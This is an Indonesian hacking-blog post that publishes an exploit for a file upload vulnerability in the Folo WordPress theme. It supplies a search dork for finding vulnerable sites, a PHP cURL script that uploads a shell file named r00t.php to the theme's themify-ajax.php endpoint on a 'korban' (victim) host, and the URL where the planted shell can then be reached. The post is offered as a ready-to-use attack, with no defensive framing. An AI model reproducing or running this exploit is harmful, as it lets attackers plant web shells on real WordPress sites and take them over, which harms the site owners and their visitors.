::

Navbar Bawah

Search This Blog

Friday 5 September 2014

Wordpress Folo Shell Upload

Exploit Title : Wordpress Themes Folo File Upload Vulnerability

#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Type : php, html, htm, asp, etc.
#Category : Web Application
#Vulnerability : File Upload
#Tested On : Windows 7 64-bit (mozilla firefox)

#Dork :inurl:/wp-content/themes/folo/ ( dork bisa agan kembangkn sndri)

  #POC :

$uploadfile=”r00t.php”;
$ch = curl_init(“http://korban/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php?upload=1″);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>

#Results See Your Shell On : http://korban/%5BPATH%5D/wp-content/themes/folo/uploads/{YOUR_FILE}.php


Untuk berlangganan Artikel silahkan Masukkan email anda kemudian cek inbox email

DMCA.com

Author : Unknown

faceblog evolutions Setelah anda membaca artikel tentang Wordpress Folo Shell Upload jika bermanfaat, silahkan tekan tombol Share. Anda juga boleh menyalin / menyebarluaskan artikel ini, namun jangan lupa untuk meletakkan link dibawah ini sebagai sumbernya :

Baca Juga:

Judul: Wordpress Folo Shell Upload
Rating: 100% based on 99998 ratings. 5 user reviews.
Ditulis Oleh Unknown
klik disini untuk menambahkan komentar blogger

Terimakasih atas kunjungan Sobat pada artikel ini,dan jangan lupa untuk meninggalkan komentar sobat tentang artikel ini.

Labels:
Top Bottom Close

0   comments

"Komentar anda menunjukkan pribadi Anda".
Silahkan tinggalkan komentar bijak yang bersifat kesan/pesan/kritik dan saran terhadap postingan!

Cancel Reply
Subscribe to: Post Comments ( Atom )